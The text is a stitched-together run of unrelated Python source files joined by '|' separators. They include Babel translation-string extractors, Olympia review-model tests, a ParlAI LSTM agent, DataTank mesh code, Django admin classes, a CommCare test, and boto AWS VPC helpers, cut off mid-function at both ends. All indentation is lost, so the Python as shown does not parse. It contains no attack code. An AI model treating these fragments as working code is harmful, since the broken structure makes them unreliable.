module, attrname = method.split(':', 1)
func = getattr(__import__(module, {}, {}, [attrname]), attrname)
else:
try:
from pkg_resources import working_set
except ImportError:
# pkg_resources is not available, so we resort to looking up the
# builtin extractors directly
builtin = {'ignore': extract_nothing, 'python': extract_python}
func = builtin.get(method)
else:
for entry_point in working_set.iter_entry_points(GROUP_NAME,
method):
func = entry_point.load(require=True)
break
if func is None:
raise ValueError('Unknown extraction method %r' % method)
results = func(fileobj, keywords.keys(), comment_tags,
options=options or {})
for lineno, funcname, messages, comments in results:
if funcname:
spec = keywords[funcname] or (1,)
else:
spec = (1,)
if not isinstance(messages, (list, tuple)):
messages = [messages]
if not messages:
continue
# Validate the messages against the keyword's specification
msgs = []
invalid = False
# last_index is 1 based like the keyword spec
last_index = len(messages)
for index in spec:
if last_index < index:
# Not enough arguments
invalid = True
break
message = messages[index - 1]
if message is None:
invalid = True
break
msgs.append(message)
if invalid:
continue
first_msg_index = spec[0] - 1
if not messages[first_msg_index]:
# An empty string msgid isn't valid, emit a warning
where = '%s:%i' % (hasattr(fileobj, 'name') and \
fileobj.name or '(unknown)', lineno)
print >> sys.stderr, empty_msgid_warning % where
continue
messages = tuple(msgs)
if len(messages) == 1:
messages = messages[0]
if strip_comment_tags:
_strip_comment_tags(comments, comment_tags)
yield lineno, messages, comments
def extract_nothing(fileobj, keywords, comment_tags, options):
"""Pseudo extractor that does not actually extract anything, but simply
returns an empty list.
"""
return []
def extract_python(fileobj, keywords, comment_tags, options):
"""Extract messages from Python source code.
:param fileobj: the seekable, file-like object the messages should be
extracted from
:param keywords: a list of keywords (i.e. function names) that should be
recognized as translation functions
:param comment_tags: a list of translator tags to search for and include
in the results
:param options: a dictionary of additional options (optional)
:return: an iterator over ``(lineno, funcname, message, comments)`` tuples
:rtype: ``iterator``
"""
funcname = lineno = message_lineno = None
call_stack = -1
buf = []
messages = []
translator_comments = []
in_def = in_translator_comments = False
comment_tag = None
encoding = parse_encoding(fileobj) or options.get('encoding', 'iso-8859-1')
tokens = generate_tokens(fileobj.readline)
for tok, value, (lineno, _), _, _ in tokens:
if call_stack == -1 and tok == NAME and value in ('def', 'class'):
in_def = True
elif tok == OP and value == '(':
if in_def:
# Avoid false positives for declarations such as:
# def gettext(arg='message'):
in_def = False
continue
if funcname:
message_lineno = lineno
call_stack += 1
elif in_def and tok == OP and value == ':':
# End of a class definition without parens
in_def = False
continue
elif call_stack == -1 and tok == COMMENT:
# Strip the comment token from the line
value = value.decode(encoding)[1:].strip()
if in_translator_comments and \
translator_comments[-1][0] == lineno - 1:
# We're already inside a translator comment, continue appending
translator_comments.append((lineno, value))
continue
# If execution reaches this point, let's see if comment line
# starts with one of the comment tags
for comment_tag in comment_tags:
if value.startswith(comment_tag):
in_translator_comments = True
translator_comments.append((lineno, value))
break
elif funcname and call_stack == 0:
if tok == OP and value == ')':
if buf:
messages.append(''.join(buf))
del buf[:]
else:
messages.append(None)
if len(messages) > 1:
messages = tuple(messages)
else:
messages = messages[0]
# Comments don't apply unless they immediately preceed the
# message
if translator_comments and \
translator_comments[-1][0] < message_lineno - 1:
translator_comments = []
yield (message_lineno, funcname, messages,
[comment[1] for comment in translator_comments])
funcname = lineno = message_lineno = None
call_stack = -1
messages = []
translator_comments = []
in_translator_comments = False
elif tok == STRING:
# Unwrap quotes in a safe manner, maintaining the string's
# encoding
# https://sourceforge.net/tracker/?func=detail&atid=355470&
# aid=617979&group_id=5470
value = eval('# coding=%s\n%s' % (encoding, value),
{'__builtins__':{}}, {})
if isinstance(value, str):
value = value.decode(encoding)
buf.append(value)
elif tok == OP and value == ',':
if buf:
messages.append(''.join(buf))
del buf[:]
else:
messages.append(None)
if translator_comments:
# We have translator comments, and since we're on a
# comma(,) user is allowed to break into a new line
# Let's increase the last comment's lineno in order
# for the comment to still be a valid one
old_lineno, old_comment = translator_comments.pop()
translator_comments.append((old_lineno+1, old_comment))
elif call_stack > 0 and tok == OP and value == ')':
call_stack -= 1
elif funcname and call_stack == -1:
funcname = None
elif tok == NAME and value in keywords:
funcname = value
def extract_javascript(fileobj, keywords, comment_tags, options):
"""Extract messages from JavaScript source code.
:param fileobj: the seekable, file-like object the messages should be
extracted from
:param keywords: a list of keywords (i.e. function names) that should be
recognized as translation functions
:param comment_tags: a list of translator tags to search for and include
in the results
:param options: a dictionary of additional options (optional)
:return: an iterator over ``(lineno, funcname, message, comments)`` tuples
:rtype: ``iterator``
"""
from babel.messages.jslexer import tokenize, unquote_string
funcname = message_lineno = None
messages = []
last_argument = None
translator_comments = []
concatenate_next = False
encoding = options.get('encoding', 'utf-8')
last_token = None
call_stack = -1
for token in tokenize(fileobj.read().decode(encoding)):
if token.type == 'operator' and token.value == '(':
if funcname:
message_lineno = token.lineno
call_stack += 1
elif call_stack == -1 and token.type == 'linecomment':
value = token.value[2:].strip()
if translator_comments and \
translator_comments[-1][0] == token.lineno - 1:
translator_comments.append((token.lineno, value))
continue
for comment_tag in comment_tags:
if value.startswith(comment_tag):
translator_comments.append((token.lineno, value.strip()))
break
elif token.type == 'multilinecomment':
# only one multi-line comment may preceed a translation
translator_comments = []
value = token.value[2:-2].strip()
for comment_tag in comment_tags:
if value.startswith(comment_tag):
lines = value.splitlines()
if lines:
lines[0] = lines[0].strip()
lines[1:] = dedent('\n'.join(lines[1:])).splitlines()
for offset, line in enumerate(lines):
translator_comments.append((token.lineno + offset,
line))
break
elif funcname and call_stack == 0:
if token.type == 'operator' and token.value == ')':
if last_argument is not None:
messages.append(last_argument)
if len(messages) > 1:
messages = tuple(messages)
elif messages:
messages = messages[0]
else:
messages = None
# Comments don't apply unless they immediately precede the
# message
if translator_comments and \
translator_comments[-1][0] < message_lineno - 1:
translator_comments = []
if messages is not None:
yield (message_lineno, funcname, messages,
[comment[1] for comment in translator_comments])
funcname = message_lineno = last_argument = None
concatenate_next = False
translator_comments = []
messages = []
call_stack = -1
elif token.type == 'string':
new_value = unquote_string(token.value)
if concatenate_next:
last_argument = (last_argument or '') + new_value
concatenate_next = False
else:
last_argument = new_value
elif token.type == 'operator':
if token.value == ',':
if last_argument is not None:
messages.append(last_argument)
last_argument = None
else:
messages.append(None)
concatenate_next = False
elif token.value == '+':
concatenate_next = True
elif call_stack > 0 and token.type == 'operator' \
and token.value == ')':
call_stack -= 1
elif funcname and call_stack == -1:
funcname = None
elif call_stack == -1 and token.type == 'name' and \
token.value in keywords and \
(last_token is None or last_token.type != 'name' or
last_token.value != 'function'):
funcname = token.value
last_token = token
|
from django.utils import translation
from nose.tools import eq_
from olympia import amo
from olympia.amo.tests import TestCase, ESTestCase
from olympia.addons.models import Addon
from olympia.reviews import tasks
from olympia.reviews.models import (
check_spam, GroupedRating, Review, ReviewFlag, Spam)
from olympia.users.models import UserProfile
class TestReviewModel(TestCase):
fixtures = ['reviews/test_models']
def test_translations(self):
translation.activate('en-US')
# There's en-US and de translations. We should get en-US.
r1 = Review.objects.get(id=1)
self.trans_eq(r1.title, 'r1 title en', 'en-US')
# There's only a de translation, so we get that.
r2 = Review.objects.get(id=2)
self.trans_eq(r2.title, 'r2 title de', 'de')
translation.activate('de')
# en and de exist, we get de.
r1 = Review.objects.get(id=1)
self.trans_eq(r1.title, 'r1 title de', 'de')
# There's only a de translation, so we get that.
r2 = Review.objects.get(id=2)
self.trans_eq(r2.title, 'r2 title de', 'de')
def test_soft_delete(self):
eq_(Review.objects.count(), 2)
eq_(Review.unfiltered.count(), 2)
Review.objects.get(id=1).delete()
eq_(Review.objects.count(), 1)
eq_(Review.unfiltered.count(), 2)
Review.objects.filter(id=2).delete()
eq_(Review.objects.count(), 0)
eq_(Review.unfiltered.count(), 2)
def test_filter_for_many_to_many(self):
# Check https://bugzilla.mozilla.org/show_bug.cgi?id=1142035.
review = Review.objects.get(id=1)
addon = review.addon
assert review in addon._reviews.all()
# Delete the review: it shouldn't be listed anymore.
review.update(deleted=True)
addon = Addon.objects.get(pk=addon.pk)
assert review not in addon._reviews.all()
def test_no_filter_for_relations(self):
# Check https://bugzilla.mozilla.org/show_bug.cgi?id=1142035.
review = Review.objects.get(id=1)
flag = ReviewFlag.objects.create(review=review,
flag='review_flag_reason_spam')
assert flag.review == review
# Delete the review: reviewflag.review should still work.
review.update(deleted=True)
flag = ReviewFlag.objects.get(pk=flag.pk)
assert flag.review == review
class TestGroupedRating(TestCase):
fixtures = ['reviews/dev-reply']
grouped_ratings = [(1, 0), (2, 0), (3, 0), (4, 1), (5, 0)]
def test_get_none(self):
eq_(GroupedRating.get(3, update_none=False), None)
def test_set(self):
eq_(GroupedRating.get(1865, update_none=False), None)
GroupedRating.set(1865)
eq_(GroupedRating.get(1865, update_none=False), self.grouped_ratings)
def test_cron(self):
eq_(GroupedRating.get(1865, update_none=False), None)
tasks.addon_grouped_rating(1865)
eq_(GroupedRating.get(1865, update_none=False), self.grouped_ratings)
def test_update_none(self):
eq_(GroupedRating.get(1865, update_none=False), None)
eq_(GroupedRating.get(1865, update_none=True), self.grouped_ratings)
class TestSpamTest(TestCase):
fixtures = ['reviews/test_models']
def test_create_not_there(self):
Review.objects.all().delete()
eq_(Review.objects.count(), 0)
check_spam(1)
def test_add(self):
assert Spam().add(Review.objects.all()[0], 'numbers')
class TestRefreshTest(ESTestCase):
fixtures = ['base/users']
def setUp(self):
super(TestRefreshTest, self).setUp()
self.addon = Addon.objects.create(type=amo.ADDON_EXTENSION)
self.user = UserProfile.objects.all()[0]
self.refresh()
eq_(self.get_bayesian_rating(), 0.0)
def get_bayesian_rating(self):
q = Addon.search().filter(id=self.addon.id)
return list(q.values_dict('bayesian_rating'))[0]['bayesian_rating'][0]
def test_created(self):
eq_(self.get_bayesian_rating(), 0.0)
Review.objects.create(addon=self.addon, user=self.user, rating=4)
self.refresh()
eq_(self.get_bayesian_rating(), 4.0)
def test_edited(self):
self.test_created()
r = self.addon.reviews.all()[0]
r.rating = 1
r.save()
self.refresh()
eq_(self.get_bayesian_rating(), 2.5)
def test_deleted(self):
self.test_created()
r = self.addon.reviews.all()[0]
r.delete()
self.refresh()
eq_(self.get_bayesian_rating(), 0.0)
|
from parlai.core.agents import Agent
from torch.autograd import Variable
from torch import optim
import torch.nn as nn
import torch
import copy
import random
class Seq2seqAgent(Agent):
"""Simple agent which uses an LSTM to process incoming text observations."""
@staticmethod
def add_cmdline_args(argparser):
argparser.add_arg('-hs', '--hiddensize', type=int, default=64,
help='size of the hidden layers and embeddings')
argparser.add_arg('-nl', '--numlayers', type=int, default=2,
help='number of hidden layers')
argparser.add_arg('-lr', '--learningrate', type=float, default=0.5,
help='learning rate')
argparser.add_arg('-dr', '--dropout', type=float, default=0.1,
help='dropout rate')
argparser.add_arg('--no-cuda', action='store_true', default=False,
help='disable GPUs even if available')
argparser.add_arg('--gpu', type=int, default=-1,
help='which GPU device to use')
def __init__(self, opt, shared=None):
super().__init__(opt, shared)
if shared and 'dictionary' in shared:
# only set up everything for the main instance
self.dict = shared['dictionary']
self.EOS = self.dict.eos_token
self.EOS_TENSOR = torch.LongTensor(self.dict.parse(self.EOS))
self.id = 'Seq2Seq'
hsz = opt['hiddensize']
self.hidden_size = hsz
self.num_layers = opt['numlayers']
self.learning_rate = opt['learningrate']
self.use_cuda = opt.get('cuda', False)
self.longest_label = 2 # TODO: 1
if 'babi' in opt['task']:
self.babi_mode = True
self.dirs = set(['n', 's', 'e', 'w'])
self.criterion = nn.NLLLoss()
self.lt = nn.Embedding(len(self.dict), hsz, padding_idx=0,
scale_grad_by_freq=True)
self.encoder = nn.GRU(hsz, hsz, opt['numlayers'])
self.decoder = nn.GRU(hsz, hsz, opt['numlayers'])
self.d2o = nn.Linear(hsz, len(self.dict))
self.dropout = nn.Dropout(opt['dropout'])
self.softmax = nn.LogSoftmax()
lr = opt['learningrate']
self.optims = {
'lt': optim.SGD(self.lt.parameters(), lr=lr),
'encoder': optim.SGD(self.encoder.parameters(), lr=lr),
'decoder': optim.SGD(self.decoder.parameters(), lr=lr),
'd2o': optim.SGD(self.d2o.parameters(), lr=lr),
}
if self.use_cuda:
self.cuda()
self.episode_done = True
def parse(self, text):
return torch.LongTensor(self.dict.txt2vec(text))
def v2t(self, vec):
return self.dict.vec2txt(vec)
def cuda(self):
self.criterion.cuda()
self.lt.cuda()
self.encoder.cuda()
self.decoder.cuda()
self.d2o.cuda()
self.dropout.cuda()
self.softmax.cuda()
def hidden_to_idx(self, hidden, drop=False):
if hidden.size(0) > 1:
raise RuntimeError('bad dimensions of tensor:', hidden)
hidden = hidden.squeeze(0)
scores = self.d2o(hidden)
if drop:
scores = self.dropout(scores)
scores = self.softmax(scores)
_max_score, idx = scores.max(1)
return idx, scores
def zero_grad(self):
for optimizer in self.optims.values():
optimizer.zero_grad()
def update_params(self):
for optimizer in self.optims.values():
optimizer.step()
def init_zeros(self, bsz=1):
t = torch.zeros(self.num_layers, bsz, self.hidden_size)
if self.use_cuda:
t = t.cuda(async=True)
return Variable(t)
def init_rand(self, bsz=1):
t = torch.FloatTensor(self.num_layers, bsz, self.hidden_size)
t.uniform_(0.05)
if self.use_cuda:
t = t.cuda(async=True)
return Variable(t)
def observe(self, observation):
observation = copy.deepcopy(observation)
if not self.episode_done:
# if the last example wasn't the end of an episode, then we need to
# recall what was said in that example
prev_dialogue = self.observation['text']
observation['text'] = prev_dialogue + '\n' + observation['text']
self.observation = observation
self.episode_done = observation['episode_done']
return observation
def update(self, xs, ys):
batchsize = len(xs)
# first encode context
xes = self.lt(xs).t()
h0 = self.init_zeros(batchsize)
_output, hn = self.encoder(xes, h0)
# start with EOS tensor for all
x = self.EOS_TENSOR
if self.use_cuda:
x = x.cuda(async=True)
x = Variable(x)
xe = self.lt(x).unsqueeze(1)
xes = xe.expand(xe.size(0), batchsize, xe.size(2))
output_lines = [[] for _ in range(batchsize)]
self.zero_grad()
# update model
loss = 0
self.longest_label = max(self.longest_label, ys.size(1))
for i in range(ys.size(1)):
output, hn = self.decoder(xes, hn)
preds, scores = self.hidden_to_idx(output, drop=True)
y = ys.select(1, i)
loss += self.criterion(scores, y)
# use the true token as the next input
xes = self.lt(y).unsqueeze(0)
# hn = self.dropout(hn)
for j in range(preds.size(0)):
token = self.v2t([preds.data[j][0]])
output_lines[j].append(token)
loss.backward()
self.update_params()
if random.random() < 0.1:
true = self.v2t(ys.data[0])
print('loss:', round(loss.data[0], 2), ' '.join(output_lines[0]), '(true: {})'.format(true))
return output_lines
def predict(self, xs):
batchsize = len(xs)
# first encode context
xes = self.lt(xs).t()
h0 = self.init_zeros(batchsize)
_output, hn = self.encoder(xes, h0)
# start with EOS tensor for all
x = self.EOS_TENSOR
if self.use_cuda:
x = x.cuda(async=True)
x = Variable(x)
xe = self.lt(x).unsqueeze(1)
xes = xe.expand(xe.size(0), batchsize, xe.size(2))
done = [False for _ in range(batchsize)]
total_done = 0
max_len = 0
output_lines = [[] for _ in range(batchsize)]
while(total_done < batchsize) and max_len < self.longest_label:
output, hn = self.decoder(xes, hn)
preds, scores = self.hidden_to_idx(output, drop=False)
xes = self.lt(preds.t())
max_len += 1
for i in range(preds.size(0)):
if not done[i]:
token = self.v2t(preds.data[i])
if token == self.EOS:
done[i] = True
total_done += 1
else:
output_lines[i].append(token)
if self.babi_mode and token not in self.dirs:
# for babi, only output one token except when
# giving directions
done[i] = True
total_done += 1
if random.random() < 0.1:
print('prediction:', ' '.join(output_lines[0]))
return output_lines
def batchify(self, obs):
exs = [ex for ex in obs if 'text' in ex]
valid_inds = [i for i, ex in enumerate(obs) if 'text' in ex]
batchsize = len(exs)
parsed = [self.parse(ex['text']) for ex in exs]
max_x_len = max([len(x) for x in parsed])
xs = torch.LongTensor(batchsize, max_x_len).fill_(0)
for i, x in enumerate(parsed):
offset = max_x_len - len(x)
for j, idx in enumerate(x):
xs[i][j + offset] = idx
if self.use_cuda:
xs = xs.cuda(async=True)
xs = Variable(xs)
ys = None
if 'labels' in exs[0]:
labels = [random.choice(ex['labels']) + ' ' + self.EOS for ex in exs]
parsed = [self.parse(y) for y in labels]
max_y_len = max(len(y) for y in parsed)
ys = torch.LongTensor(batchsize, max_y_len).fill_(0)
for i, y in enumerate(parsed):
for j, idx in enumerate(y):
ys[i][j] = idx
if self.use_cuda:
ys = ys.cuda(async=True)
ys = Variable(ys)
return xs, ys, valid_inds
def batch_act(self, observations):
batchsize = len(observations)
batch_reply = [{'id': self.getID()} for _ in range(batchsize)]
xs, ys, valid_inds = self.batchify(observations)
if len(xs) == 0:
return batch_reply
# Either train or predict
if ys is not None:
predictions = self.update(xs, ys)
else:
predictions = self.predict(xs)
for i in range(len(predictions)):
batch_reply[valid_inds[i]]['text'] = ' '.join(
c for c in predictions[i] if c != self.EOS)
return batch_reply
def act(self):
return self.batch_act([self.observation])[0]
def save(self, path):
model = {}
model['lt'] = self.lt.state_dict()
model['encoder'] = self.encoder.state_dict()
model['decoder'] = self.decoder.state_dict()
model['d2o'] = self.d2o.state_dict()
model['longest_label'] = self.longest_label
with open(path, 'wb') as write:
torch.save(model, write)
def load(self, path):
with open(path, 'rb') as read:
model = torch.load(read)
self.lt.load_state_dict(model['lt'])
self.encoder.load_state_dict(model['encoder'])
self.decoder.load_state_dict(model['decoder'])
self.d2o.load_state_dict(model['d2o'])
self.longest_label = model['longest_label']
|
from datatank_py.DTStructuredGrid2D import DTStructuredGrid2D, _squeeze2d
import numpy as np
class DTStructuredMesh2D(object):
"""2D structured mesh object.
This class corresponds to DataTank's DTStructuredMesh2D.
"""
dt_type = ("2D Structured Mesh",)
"""Type strings allowed by DataTank"""
def __init__(self, values, grid=None):
"""
:param values: 2D array of values
:param grid: DTStructuredGrid2D object (defaults to unit grid) or the name of a previously saved grid
Note that the values array must be ordered as (y, x) for compatibility
with the grid and DataTank.
"""
super(DTStructuredMesh2D, self).__init__()
values = _squeeze2d(values)
shape = np.shape(values)
assert len(shape) == 2, "values array must be 2D"
if isinstance(grid, basestring) == False:
if grid == None:
grid = DTStructuredGrid2D(range(shape[1]), range(shape[0]))
assert shape == grid.shape(), "grid shape %s != value shape %s" % (grid.shape(), shape)
self._grid = grid
self._values = values
def grid(self):
""":returns: a :class:`datatank_py.DTStructuredGrid2D.DTStructuredGrid2D` instance"""
return self._grid
def values(self):
""":returns: a 2D numpy array of values at each grid node"""
return self._values
def __dt_type__(self):
return "2D Structured Mesh"
def __str__(self):
return self.__dt_type__() + ":\n " + str(self._grid) + "\n" + " Values:\n " + str(self._values)
def __dt_write__(self, datafile, name):
datafile.write_anonymous(self._grid, name)
datafile.write_anonymous(self._values, name + "_V")
def write_with_shared_grid(self, datafile, name, grid_name, time, time_index):
"""Allows saving a single grid and sharing it amongst different time
values of a variable.
:param datafile: a :class:`datatank_py.DTDataFile.DTDataFile` open for writing
:param name: the mesh variable's name
:param grid_name: the grid name to be shared (will not be visible in DataTank)
:param time: the time value for this step (DataTank's ``t`` variable)
:param time_index: the corresponding integer index of this time step
This is an advanced technique, but it can give a significant space savings in
a data file. It's not widely implemented, since it's not clear yet if this
is the best API.
"""
if grid_name not in datafile:
datafile.write_anonymous(self._grid, grid_name)
datafile.write_anonymous(self.__dt_type__(), "Seq_" + name)
varname = "%s_%d" % (name, time_index)
datafile.write_anonymous(grid_name, varname)
datafile.write_anonymous(self._values, varname + "_V")
datafile.write_anonymous(np.array((time,)), varname + "_time")
@classmethod
def from_data_file(self, datafile, name):
grid = DTStructuredGrid2D.from_data_file(datafile, name)
values = datafile[name + "_V"]
return DTStructuredMesh2D(values, grid=grid)
if __name__ == '__main__':
from DTDataFile import DTDataFile
with DTDataFile("test/structured_mesh2D.dtbin", truncate=True) as df:
xvals = np.exp(np.array(range(18), dtype=np.float) / 5)
yvals = np.exp(np.array(range(20), dtype=np.float) / 5)
grid = DTStructuredGrid2D(xvals, yvals)
values = np.zeros(len(xvals) * len(yvals))
for i in xrange(len(values)):
values[i] = i
# DataTank indexes differently from numpy; the grid is z,y,x ordered
values = values.reshape(grid.shape())
mesh = DTStructuredMesh2D(values, grid=grid)
df["2D mesh"] = mesh
|
x = 1
print(x)
import time
time.sleep(10)
print(x)
|
import errno
import os
import shutil
def mkdir(path, mode=0o777, exist_ok=False):
try:
os.mkdir(path, mode)
except OSError as e:
if not exist_ok or e.errno != errno.EEXIST or not os.path.isdir(path):
raise
def makedirs(path, mode=0o777, exist_ok=False):
try:
os.makedirs(path, mode)
except OSError as e:
if not exist_ok or e.errno != errno.EEXIST or not os.path.isdir(path):
raise
def parent_dir(path):
return os.path.normpath(os.path.join(path, os.pardir))
def existing_parent(path):
while not os.path.exists(path):
path = parent_dir(path)
return path
def remove(path, nonexist_ok=False):
try:
os.remove(path)
except OSError as e:
if not nonexist_ok or e.errno != errno.ENOENT:
raise
def copy(src, dst, recursive=False, symlink='relative', mode=None):
if symlink != 'never' and os.path.islink(src):
link = os.readlink(src)
if symlink == 'always' or not os.path.isabs(link):
remove(dst, nonexist_ok=True)
os.symlink(link, dst)
return
if os.path.isdir(src):
mkdir(dst, exist_ok=True)
if recursive:
for name in os.listdir(src):
copy(os.path.join(src, name), os.path.join(dst, name))
else:
shutil.copyfile(src, dst)
if mode is not None:
os.chmod(dst, mode)
else:
shutil.copymode(src, dst)
|
from django.contrib import admin
from django.core.urlresolvers import reverse
from vkontakte_api.admin import VkontakteModelAdmin
from .models import Album, Video
class VideoInline(admin.TabularInline):
def image(self, instance):
return '<img src="%s" />' % (instance.photo_130,)
image.short_description = 'video'
image.allow_tags = True
model = Video
fields = ('title', 'image', 'owner', 'comments_count', 'views_count')
readonly_fields = fields
extra = False
can_delete = False
class AlbumAdmin(VkontakteModelAdmin):
def image_preview(self, obj):
return u'<a href="%s"><img src="%s" height="30" /></a>' % (obj.photo_160, obj.photo_160)
image_preview.short_description = u'Картинка'
image_preview.allow_tags = True
list_display = ('image_preview', 'remote_id', 'title', 'owner', 'videos_count')
list_display_links = ('title', 'remote_id',)
search_fields = ('title', 'description')
inlines = [VideoInline]
class VideoAdmin(VkontakteModelAdmin):
def image_preview(self, obj):
return u'<a href="%s"><img src="%s" height="30" /></a>' % (obj.photo_130, obj.photo_130)
image_preview.short_description = u'Картинка'
image_preview.allow_tags = True
list_display = ('image_preview', 'remote_id', 'owner', 'album', 'title', 'comments_count', 'views_count', 'date')
list_display_links = ('remote_id', 'title')
list_filter = ('album',)
admin.site.register(Album, AlbumAdmin)
admin.site.register(Video, VideoAdmin)
|
"""
This scripts compares the autocorrelation in statsmodels with
the one that you can build using only correlate.
"""
import numpy as np
import matplotlib.pyplot as plt
import scipy.signal as signal
import statsmodels.api as sm
from signals.time_series_class import MixAr, AR
from signals.aux_functions import sidekick
plot = False
plot2 = True
dt = 0.1
Tmax = 100
amplitude = 1
w1 = 1
w2 = 5
beta = sidekick(w1, w2, dt, Tmax, amplitude)
phi0 = 0.0
phi1 = -0.8
phi2 = 0.3
phi = np.array((phi0, phi1, phi2))
x0 = 1
x1 = 1
x2 = 0
initial_conditions = np.array((x0, x1, x2))
B = AR(phi, dt=dt, Tmax=Tmax)
B.initial_conditions(initial_conditions)
normal_series = B.construct_series()
A = MixAr(phi, dt=dt, Tmax=Tmax, beta=beta)
A.initial_conditions(initial_conditions)
mix_series = A.construct_series()
time = A.time
if plot:
plt.subplot(3, 1, 1)
plt.plot(time, beta)
plt.subplot(3, 1, 2)
plt.plot(time, normal_series)
plt.subplot(3, 1, 3)
plt.plot(time, mix_series)
plt.show()
nlags = 40
normal_series -= normal_series.mean()
var = np.var(normal_series)
n = len(normal_series)
nlags1 = nlags
normalizing = np.arange(n, n - nlags1, -1)
auto_correlation1 = np.correlate(normal_series, normal_series, mode='full')
aux = auto_correlation1.size/2
auto_correlation1 = auto_correlation1[aux:aux + nlags1] / (normalizing * var)
auto_correlation2 = sm.tsa.stattools.acf(normal_series, nlags=nlags)
print 'result', np.sum(auto_correlation1 - auto_correlation2)
if plot2:
plt.subplot(2, 1, 1)
plt.plot(auto_correlation1)
plt.subplot(2, 1, 2)
plt.plot(auto_correlation2)
plt.show()
|
import os.path
from flask import url_for
from npactflask import app
@app.context_processor
def vSTATIC():
def STATICV(filename):
if app.config['DEBUG']:
vnum = os.path.getmtime(os.path.join(app.static_folder, filename))
else:
vnum = app.config['VERSION']
return (url_for('static', filename=filename, vnum=vnum))
return dict(vSTATIC=STATICV)
|
from toyz.web import app
from toyz.web import tasks
|
from StringIO import StringIO
from django.test import TestCase
from django.test.client import Client
from corehq.apps.app_manager.models import Application, APP_V1, Module
from corehq.apps.app_manager.success_message import SuccessMessage
from corehq.apps.domain.shortcuts import create_domain
from corehq.apps.users.models import CommCareUser
from datetime import datetime, timedelta
from dimagi.utils.parsing import json_format_datetime
from receiver.xml import get_simple_response_xml, ResponseNature
submission_template = """<?xml version='1.0' ?>
<data xmlns="%(xmlns)s">
<meta>
<username>%(username)s</username>
<userID>%(userID)s</userID>
</meta>
</data>
"""
class SuccessMessageTest(TestCase):
message = "Thanks $first_name ($name)! You have submitted $today forms today and $week forms since Monday."
domain = "test"
username = "danny"
first_name = "Danny"
last_name = "Roberts"
password = "123"
xmlns = "http://dimagi.com/does_not_matter"
tz = timedelta(hours=0)
def setUp(self):
create_domain(self.domain)
couch_user = CommCareUser.create(self.domain, self.username, self.password)
userID = couch_user.user_id
couch_user.first_name = self.first_name
couch_user.last_name = self.last_name
couch_user.save()
self.sm = SuccessMessage(self.message, userID, tz=self.tz)
c = Client()
app = Application.new_app(self.domain, "Test App", application_version=APP_V1)
app.add_module(Module.new_module("Test Module", "en"))
form = app.new_form(0, "Test Form", "en")
form.xmlns = self.xmlns
app.success_message = {"en": self.message}
app.save()
def fake_form_submission(userID=userID, username=self.username, xmlns=self.xmlns, time=None):
submission = submission_template % {
"userID": userID,
"username": username,
"xmlns": xmlns
}
f = StringIO(submission.encode('utf-8'))
f.name = "tempfile.xml"
kwargs = dict(HTTP_X_SUBMIT_TIME=json_format_datetime(time)) if time else {}
response = c.post("/a/{self.domain}/receiver/".format(self=self), {
'xml_submission_file': f,
}, **kwargs)
return response
self.num_forms_today = 0
self.num_forms_this_week = 0
now = datetime.utcnow()
tznow = now + self.tz
week_start = tznow - timedelta(days=tznow.weekday())
week_start = datetime(week_start.year, week_start.month, week_start.day) - self.tz
day_start = datetime(tznow.year, tznow.month, tznow.day) - self.tz
spacing = 6
for h in xrange((24/spacing)*8):
time = now-timedelta(hours=spacing*h)
response = fake_form_submission(time=time)
if time > week_start:
self.num_forms_this_week += 1
if time > day_start:
self.num_forms_today += 1
self.assertEqual(
response.content,
get_simple_response_xml(("Thanks {self.first_name} ({self.first_name} {self.last_name})! "
"You have submitted {self.num_forms_today} forms today "
"and {self.num_forms_this_week} forms since Monday.").format(self=self),
nature=ResponseNature.SUBMIT_SUCCESS)
)
def testRender(self):
self.assertEqual(
self.sm.render(),
("Thanks {self.first_name} ({self.first_name} {self.last_name})! "
"You have submitted {self.num_forms_today} forms today "
"and {self.num_forms_this_week} forms since Monday.").format(self=self)
)
|
from django import forms
from oldcontrib.media.document.models import Document
class DocumentUpload(forms.ModelForm):
class Meta:
model = Document
fields = ('document',)
|
from setuptools import setup, Extension
setup(
name = "python-libmemcached",
version = "0.17.0",
description="python memcached client wrapped on libmemcached",
maintainer="subdragon",
maintainer_email="subdragon@gmail.com",
requires = ['pyrex'],
# This assumes that libmemcache is installed with base /usr/local
ext_modules=[Extension('cmemcached', ['cmemcached.pyx'],
libraries=['memcached'],
)],
test_suite="cmemcached_test",
)
|
from aws_lib import SpinupError
import base64
from boto import vpc, ec2
from os import environ
from pprint import pprint
import re
import sys
import time
from yaml_lib import yaml_attr
def read_user_data( fn ):
"""
Given a filename, returns the file's contents in a string.
"""
r = ''
with open( fn ) as fh:
r = fh.read()
fh.close()
return r
def get_tags( ec, r_id ):
"""
Takes EC2Connection object and resource ID. Returns tags associated
with that resource.
"""
return ec.get_all_tags(filters={ "resource-id": r_id })
def get_tag( ec, obj, tag ):
"""
Get the value of a tag associated with the given resource object.
Returns None if the tag is not set. Warning: EC2 tags are case-sensitive.
"""
tags = get_tags( ec, obj.id )
found = 0
for t in tags:
if t.name == tag:
found = 1
break
if found:
return t
else:
return None
def update_tag( obj, tag, val ):
"""
Given an EC2 resource object, a tag and a value, updates the given tag
to val.
"""
for x in range(0, 5):
error = False
try:
obj.add_tag( tag, val )
except:
error = True
e = sys.exc_info()[0]
print "Huh, trying again ({})".format(e)
time.sleep(5)
if not error:
print "Object {} successfully tagged.".format(obj)
break
return None
def init_region( r ):
"""
Takes a region string. Connects to that region. Returns EC2Connection
and VPCConnection objects in a tuple.
"""
# connect to region
c = vpc.connect_to_region( r )
ec = ec2.connect_to_region( r )
return ( c, ec )
def init_vpc( c, cidr ):
"""
Takes VPCConnection object (which is actually a connection to a
particular region) and a CIDR block string. Looks for our VPC in that
region. Returns the boto.vpc.vpc.VPC object corresponding to our VPC.
See:
http://boto.readthedocs.org/en/latest/ref/vpc.html#boto.vpc.vpc.VPC
"""
# look for our VPC
all_vpcs = c.get_all_vpcs()
found = 0
our_vpc = None
for v in all_vpcs:
if v.cidr_block == cidr:
our_vpc = v
found = 1
break
if not found:
raise SpinupError( "VPC {} not found".format(cidr) )
return our_vpc
def init_subnet( c, vpc_id, cidr ):
"""
Takes VPCConnection object, which is actually a connection to a
region, and a CIDR block string. Looks for our subnet in that region.
If subnet does not exist, creates it. Returns the subnet resource
object on success, raises exception on failure.
"""
# look for our VPC
all_subnets = c.get_all_subnets()
found = False
our_subnet = None
for s in all_subnets:
if s.cidr_block == cidr:
#print "Found subnet {}".format(cidr)
our_subnet = s
found = True
break
if not found:
our_subnet = c.create_subnet( vpc_id, cidr )
return our_subnet
def set_subnet_map_public_ip( ec, subnet_id ):
"""
